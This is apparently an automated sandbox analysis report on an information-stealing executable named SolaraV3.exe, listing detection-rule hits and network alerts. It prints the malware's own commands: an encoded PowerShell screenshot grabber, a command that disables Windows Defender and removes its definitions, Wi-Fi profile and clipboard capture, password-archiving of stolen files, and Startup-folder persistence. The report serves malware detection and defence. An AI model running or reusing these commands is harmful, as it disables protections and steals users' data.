EUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7532, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7312, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", ProcessId: 7932, ProcessName: cvtres.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5736, TargetFilename: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, CommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8024, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, ProcessId: 7696, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1660, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 6044, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6924, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7888, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE SynthIndi Loader CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T15:33:04.576286+0200	2857752	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49733	TCP

ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T15:33:02.791270+0200	2857751	1	A Network Trojan was detected	192.168.2.7	49733	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

110_2_00007FF74EE8901C

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

